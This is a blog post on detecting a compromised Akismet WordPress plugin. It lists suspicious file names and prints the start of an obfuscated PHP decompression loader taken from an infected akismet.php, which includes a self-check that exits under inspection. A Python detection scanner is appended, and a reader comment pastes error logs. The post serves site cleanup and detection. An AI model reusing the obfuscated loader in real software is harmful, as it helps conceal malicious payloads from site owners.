Akismet Hacked

If your WordPress site has been compromised, check your Akismet plugin. It’s so commonly used that it’s often subject to attacks.

If any of these files are showing up in your plugins folder, you may be the subject of an attack:

  1. .akismet.cache.php
  2. .akismet.bak.php
  3. .akismet.old.php
  4. class-akismet.php
  5. db-akismet.php

One akismet.php file that I found started out something like this:

<?php if (!function_exists("TC9A16C47DA8EEE87")) {
    function TC9A16C47DA8EEE87($T059EC46CFE335260) {
        $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
        $TC9A16C47DA8EEE87 = 0;
        $TA7FB8B0A1C0E2E9E = 0;
        $T17D35BB9DF7A47E4 = 0;
        $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
        $TBF14159DC7D007D3 = 3;
        $T77605D5F26DD5248 = 0;
        $T4A747C3263CA7A55 = 16;
        $T7C7E72B89B83E235 = "";
        $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
        $T43D5686285035C13 = __FILE__;
        $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
        $T6BBC58A3B5B11DC4 = 0;
        preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
        for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
            if (count($T6BBC58A3B5B11DC4)) exit;
            if ($T4A747C3263CA7A55 == 0) {
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                $T4A747C3263CA7A55 = 16;
            }
            if ($T65CE9F6823D588A7 & 0x8000) {
                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                if ($TC9A16C47DA8EEE87) {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                } else {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                    $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                    for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                    $TBF14159DC7D007D3++;
                    $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E;
                }
            } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
            $T65CE9F6823D588A7 <<= 1;
            $T4A747C3263CA7A55--;
            if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                return $T43D5686285035C13;
            }
        }
    }
};
?>

The full obfuscated PHP code of the akismet.php file I came across is posted here: http://codepaste.net/jc2996

See this post regarding the Pharma Hack for more information.
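A scanner for the two indicators described above, added here as an example (it is not code from the original post or from the Akismet project): it flags the listed file names and any PHP file that shares the sample's traits, namely identifiers made of "T" plus 16 hex digits and base64_decode() called on a string literal. The min_idents threshold and the demo files are assumptions constructed for illustration. The base64 literal in the sample decodes to the regex /(print|sprint|echo)/, which the function matches against its own file and exits on a hit.

```python
import base64
import re
import tempfile
from pathlib import Path

# File names the post lists as signs of compromise.
SUSPECT_NAMES = {".akismet.cache.php", ".akismet.bak.php", ".akismet.old.php",
                 "class-akismet.php", "db-akismet.php"}
# Traits of the post's sample: "T" + 16 hex identifiers, base64_decode() on a literal.
OBF_IDENT = re.compile(r"\bT[0-9A-F]{16}\b")
B64_CALL = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]{8,})[\"']\s*\)")

def scan_php_source(text):
    """Return (distinct obfuscated identifiers, decoded base64 literals)."""
    decoded = []
    for literal in B64_CALL.findall(text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("latin-1"))
        except ValueError:
            pass  # not valid base64, nothing to show the analyst
    return set(OBF_IDENT.findall(text)), decoded

def scan_plugins(root, min_idents=5):
    """Walk a plugins directory and return {relative path: [reasons]} for flagged files."""
    findings = {}
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        reasons = ["file name listed in the post"] if path.name in SUSPECT_NAMES else []
        if path.suffix == ".php":
            idents, decoded = scan_php_source(path.read_text(encoding="latin-1"))
            if len(idents) >= min_idents:  # assumed threshold, tune for your code base
                reasons.append(f"{len(idents)} T+16-hex identifiers")
            reasons += [f"base64 literal decodes to {d!r}" for d in decoded]
        if reasons:
            findings[str(path.relative_to(root))] = reasons
    return findings

def demo():
    """Scan a constructed tree: a file imitating the sample, a listed name, a clean file."""
    sample = ('<?php function TC9A16C47DA8EEE87($T059EC46CFE335260) {'
              ' $T65CE9F6823D588A7 = 0; $TBF14159DC7D007D3 = 3; $T4A747C3263CA7A55 = 16;'
              ' preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), "", $m); }')
    files = {"akismet.php": sample, ".akismet.bak.php": "<?php", "readme.php": "<?php echo 1;"}
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            Path(root, name).write_text(body)
        return scan_plugins(root)

if __name__ == "__main__":
    print(*(f"{n} -> {'; '.join(r)}" for n, r in sorted(demo().items())), sep="\n")
```

Point scan_plugins() at wp-content/plugins; a hit is a reason to inspect the file by hand, not proof of compromise.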


One Response to Akismet Hacked

  1. Alberto says:

    It throws errors under WordPress 3.2; here is the log for the author to analyze.
    Warning: fopen(xxxx/wp-content/themes/iBluety/style.css) [function.fopen]: failed to open seratm: No such file or directory in xxxx/wp-includes/functions.php on line 4339
    Warning: fread(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4342
    Warning: fclose(): supplied argument is not a valid seratm resource in xxxx/wp-includes/functions.php on line 4345
